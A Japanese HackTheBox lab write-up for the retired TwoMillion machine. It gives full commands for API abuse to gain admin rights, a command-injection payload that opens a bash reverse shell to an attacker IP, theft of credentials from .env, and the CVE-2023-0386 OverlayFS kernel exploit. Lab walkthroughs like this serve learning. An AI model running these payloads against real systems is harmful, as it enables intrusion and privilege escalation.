
HackTheBox TwoMillion マシンの writeup — API 悪用、コマンドインジェクション & CVE-2023-0386
HackTheBox TwoMillion マシンの攻略記事 — API 悪用、コマンドインジェクション & CVE-2023-0386
| 項目 | 詳細 |
|---|---|
| 名前 | TwoMillion |
| 難易度 | 簡単 |
| OS | Linux |
| IP | 10.10.11.221 |
| CVE | CVE-2023-0386 |
TwoMillion は、旧 HackTheBox プラットフォームをテーマにした Easy な Linux マシンです。招待コードのデコード、API エンドポイントの悪用、OS コマンドインジェクション、資格情報の発見、CVE-2023-0386 (OverlayFS) を介した Linux カーネルの権限昇格を含みます。
nmap -sV -sC -v 10.10.11.221
開放ポート:
2million.htb にリダイレクト/etc/hosts に追加:
echo "10.10.11.221 2million.htb" >> /etc/hosts
curl -X POST http://2million.htb/api/v1/invite/how/to/generate
レスポンスは ROT13 エンコードされています。デコード:
echo "Va beqre gb trarengr..." | tr 'A-Za-z' 'N-ZA-Mn-za-m'
招待コードを生成:
curl -X POST http://2million.htb/api/v1/invite/generate
echo "BASE64==" | base64 -d
デコードした招待コードを使って http://2million.htb/register に登録します。
ブラウザでログインし、Cookie から PHPSESSID を取得 (F12 → Application → Cookies)。
管理者に昇格:
curl -X PUT http://2million.htb/api/v1/admin/settings/update \
-b "PHPSESSID=<your_session>" \
-H "Content-Type: application/json" \
--data '{"email":"[email protected]","is_admin":1}'
確認:
curl -b "PHPSESSID=<your_session>" http://2million.htb/api/v1/admin/auth
# {"message":true}
リスナーを起動:
nc -lvnp 4444
リバースシェルのペイロードを送信:
curl -s -X POST http://2million.htb/api/v1/admin/vpn/generate \
-b "PHPSESSID=<your_session>" \
-H "Content-Type: application/json" \
--data '{"username":"test;bash -c '"'"'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"'"' #"}'
www-data としてシェルを取得。
.env から認証情報を探す:
cat /var/www/html/.env
# DB_USERNAME=admin
# DB_PASSWORD=SuperDuperPass123
SSH でログイン:
ssh [email protected]
cat ~/user.txt
ヒントを確認:
cat /var/mail/admin
uname -r
# 5.15.70 — vulnerable to CVE-2023-0386
Kali でエクスプロイトをダウンロードしてコンパイル:
git clone https://github.com/xkaneiki/CVE-2023-0386
cd CVE-2023-0386
make all
ターゲットに転送:
# Kali
python3 -m http.server 8000
# Target
wget http://YOUR_IP:8000/exploit.zip
unzip exploit.zip
make all
ターゲット上で2つの端末で実行:
Terminal 1:
./fuse ./ovlcap/lower ./gc
Terminal 2:
./exp
ルートフラグを取得:
cat /root/root.txt
この攻略記事は、リタイアされた HackTheBox マシンにおける教育目的のみのものです。
| ステップ | 手法 |
|---|
| 偵察 | Nmap scan |
| 招待コード | ROT13 + Base64 decode |
| Web 権限昇格 | API 操作 → 管理者 |
| 初期シェル | OS command injection |
| 横方向移動 | .env の認証情報 → SSH |
| ルート | CVE-2023-0386 OverlayFS exploit |